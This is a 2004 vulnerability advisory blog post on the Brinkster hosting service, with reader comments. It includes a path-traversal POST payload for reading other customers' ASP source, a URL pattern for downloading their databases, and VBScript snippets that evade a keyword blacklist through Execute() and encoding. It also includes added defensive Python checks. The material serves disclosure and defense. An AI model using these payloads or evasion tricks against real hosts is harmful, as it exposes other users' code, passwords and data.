Brinkster Multiple Vulnerabilities

08.02.2004

- ------------------------------------------------------
BRINKSTER MULTIPLE VULNERABILITIES
- ------------------------------------------------------
Online URL : http://ferruh.mavituna.com/?435

1. Retrieving other users ASP Source Codes
Severity: Highly Critical

2. Accessing Database Files
Severity: Medium Critical

3. Skipping Brinkster Code Controls
Severity: Low Critical


- ------------------------------------------------------
ABOUT BRINKSTER;
- ------------------------------------------------------
Brinkster is a popular free and paid Windows-based web hosting company with many customers: www.brinkster.com

- ------------------------------------------------------
VULNERABLE;
- ------------------------------------------------------
Currently (1/26/2004) Brinkster.com is vulnerable;

- ------------------------------------------------------
1.RETRIEVING OTHER USERS ASP SOURCE CODES
- ------------------------------------------------------
Any valid user can access other users' source code just by knowing the file names. An attacker can therefore read ASP source code, database passwords and other information contained in the source.

This problem is related to the Brinkster File Manager (http://www.brinkster.com/FileManager.asp). The File Manager Edit page (http://www.brinkster.com/FileManagerEdit.asp) allows an attacker to access other users' files by modifying POST requests.

	------------------------------------------------------
	URL	: http://www.brinkster.com/FileManagerEdit.asp
	POST	: faction=editfile&file2edit=%5C..%5C[VICTIM USERNAME]%5C[FILE TO READ AS TEXT]
	------------------------------------------------------
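
The server-side check whose absence this issue describes, as an added example (not Brinkster's code and not part of the original advisory): the file2edit value is resolved against the logged-in user's directory and refused if it normalizes to anywhere else. WEB_ROOT, the one-directory-per-user layout and the function name resolve_edit_target are assumptions made for illustration.

```python
import ntpath  # Windows path rules, usable on any platform
from urllib.parse import parse_qs

# Assumption: each account's files live in WEB_ROOT\<username>.
WEB_ROOT = r"D:\webs"

def resolve_edit_target(session_user, post_body, web_root=WEB_ROOT):
    """Map the file2edit field to a path inside session_user's directory.
    Returns the normalized path, or None when the request must be refused.
    session_user comes from the authenticated session, never from the form."""
    values = parse_qs(post_body, keep_blank_values=True).get("file2edit", [])
    if len(values) != 1 or not values[0] or "\x00" in values[0]:
        return None
    requested = values[0].replace("/", "\\")
    # Drive letters and alternate data streams have no place in this field.
    if ":" in requested:
        return None
    home = ntpath.normpath(ntpath.join(web_root, session_user))
    # Treat the value as relative to the user's home, then collapse "..".
    candidate = ntpath.normpath(ntpath.join(home, requested.lstrip("\\")))
    # Compare normalized, case-folded paths; the trailing separator stops
    # D:\webs\alice2 from passing as a child of D:\webs\alice.
    if not ntpath.normcase(candidate).startswith(ntpath.normcase(home) + "\\"):
        return None
    return candidate

if __name__ == "__main__":
    # Constructed requests; the first has the shape shown in the advisory.
    for body in (
        "faction=editfile&file2edit=%5C..%5Cvictim%5Cdefault.asp",
        "faction=editfile&file2edit=%5Cincludes%5Cconn.asp",
    ):
        print(body, "->", resolve_edit_target("alice", body))
```

The comparison has to run on the normalized path, after decoding, and against the session's user name; checking the raw string for ".." before decoding leaves the same gap open.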

- ------------------------------------------------------
2. ACCESSING DATABASE FILES
- ------------------------------------------------------
If you know the name of any Brinkster user's database file, you can download it. (You can find the database name from the source code; see the first vulnerability.)

	------------------------------------------------------
	Database URL;

	http://[BrinksterServer].brinkster.com/[Username]/db/[DatabaseFileName]
	------------------------------------------------------


- ------------------------------------------------------
3. SKIPPING CODE CONTROLS
- ------------------------------------------------------
Brinkster does not allow certain code snippets in ASP files, for server performance reasons, such as "Server.Scripttimeout = 8000". The Brinkster File Manager automatically scans your uploaded source code and, if it finds any restricted keyword, deletes the uploaded file.

You can skip this check by using the ASP built-in Execute() function, which is not in the Brinkster keyword blacklist. So write a simple encoder and decoder for your code and run it through Execute().


	------------------------------------------------------
	Proof of Concept;
	------------------------------------------------------	
	1) Simple Method without Execute();
	<%
	 On _
	 Error Resume Next
	%>

	2) Another Method with Execute();
	<%
	Dim onErrorStr
	onErrorStr = "S e r v e r.S c r i p t T i m e o u t-E r r o r-R e s u m e-N e x t"
	Execute(Replace(Replace(onErrorStr," ",""),"-"," "))
	%>


	3) Another one with ASCII values and Execute();
	This code allows you to set "Server.Scripttimeout";
	<%
	Dim converted
	Const errStr = "083101114118101114046083099114105112116084105109101111117116032061032057048048048048048048048048 "
		converted = Asc2Str(errStr)
		Execute(converted)

		Response.Write converted	

		Function Asc2Str(byVal text)
			Dim converted, character, i
			For i = 0 to Round((Len(text)-1)/3,0)
				If Len(text) > 2 Then
					character = Chr(Left(text,3))
					converted = converted & character
					text = Right(text,Len(text)-3)
				End If
			Next

			Asc2Str = converted
		End Function
	%>
	------------------------------------------------------
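
Why a substring blacklist misses all three methods above, and what an upload scanner can flag instead, as an added example (not Brinkster's scanner and not part of the original advisory). BLACKLIST is a constructed stand-in, since the advisory names only "Server.Scripttimeout"; the second and third samples are abbreviated from the proof-of-concept snippets.

```python
import re

# Constructed stand-in for the host's keyword list (assumption).
BLACKLIST = ["server.scripttimeout", "on error resume next"]

# VBScript primitives that run a string as code.
DYNAMIC_EVAL = re.compile(r"\b(?:Execute|ExecuteGlobal|Eval)\b", re.IGNORECASE)
# VBScript line continuation: whitespace, underscore, end of line.
LINE_CONTINUATION = re.compile(r"[ \t]+_[ \t]*\r?\n[ \t]*")

def naive_scan(source):
    """Plain substring blacklist, the kind of check the advisory describes."""
    lowered = source.lower()
    return [kw for kw in BLACKLIST if kw in lowered]

def hardened_scan(source):
    """Join continued lines before matching and flag dynamic evaluation."""
    joined = LINE_CONTINUATION.sub(" ", source)
    collapsed = re.sub(r"\s+", " ", joined).lower()
    findings = [kw for kw in BLACKLIST if kw in collapsed]
    if DYNAMIC_EVAL.search(joined):
        # The executed text exists only at run time; no keyword list sees it.
        findings.append("dynamic-eval")
    return findings

# Samples: the advisory's three methods (2 and 3 abbreviated) and one
# constructed benign page.
SAMPLES = {
    "poc1_continuation": "<%\n On _\n Error Resume Next\n%>",
    "poc2_spaced_string": '<%\nonErrorStr = "S e r v e r.S c r i p t T i m e o u t"\n'
                          'Execute(Replace(onErrorStr," ",""))\n%>',
    "poc3_ascii_codes": '<%\nConst errStr = "083101114"\nExecute(Asc2Str(errStr))\n%>',
    "benign": '<%\nResponse.Write "hello"\n%>',
}

def scan_all():
    return {name: (naive_scan(s), hardened_scan(s)) for name, s in SAMPLES.items()}

if __name__ == "__main__":
    for name, (naive, hardened) in scan_all().items():
        print(f"{name:20} naive={naive} hardened={hardened}")
```

A "dynamic-eval" finding is a reason to hold the upload for review, not proof of abuse; limits such as script timeout are reliably enforced only by the server at run time, not by scanning source text.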



- ------------------------------------------------------
HISTORY;
- ------------------------------------------------------
01.01.2004 - Discovered
01.18.2004 - Vendor Informed
02.08.2004 - Published

- ------------------------------------------------------
Vendor Status;
- ------------------------------------------------------
2 e-mails, no answer.


Ferruh Mavituna
Web Application Security Specialist
http://ferruh.mavituna.com

Comments


Will you also publish a Turkish version of this document?

[ # | 08.02.2004 ]

Yes, I would be glad if you published the Turkish version of this document.

Shiva Shidapu [ # | 09.02.2004 ]

The Turkish version of the document;
http://ferruh.mavituna.com/article/?437

Ferruh Mavituna [ # | 09.02.2004 ]

Thank you for your interest.. @Ferruh

Shiva Shidapu [ # | 09.02.2004 ]

Can you show me an example about BRINKSTER MULTIPLE VULNERABILITIES? I have an account in Brinkster. Can I show other user's password?

Example [ # | 20.02.2004 ]

You can't see other users' accounts, but you may be able to access other users' files and databases, and vice versa.

Ferruh Mavituna [ # | 20.02.2004 ]

My friend can show my password from my account. In Brinkster my account is QUANGND and he can show the password like *****

I don't know how to exp. [ # | 20.02.2004 ]

Since the subject is related to Brinkster, I felt the need to write to you, because I could not find any Turkish writing about Brinkster on the net.
I had a site on Brinkster, and the backup of the site was on a hard disk. The disk failed and everything on it was lost. I have projects that I made on my site, and I was thinking I could at least get those back, but on Brinkster you cannot download files under their own names. Besides, it is 30 MB and thousands of files. So I paid 3.5 + 3.5, 7 dollars in total, and bought one month of FTP; my aim was to get my files from Brinkster. I logged in to the FTP with an FTP program, but there are no files at all.
Since I don't know English, I cannot explain my problem to anyone. What should I do now? I bought the FTP today; will it be opened later, or did I do something wrong? I would be glad if you could help.

MERT MURAT [ # | 20.03.2004 ]

Ferruh Mavituna
© 2002-2007, Ferruh Mavituna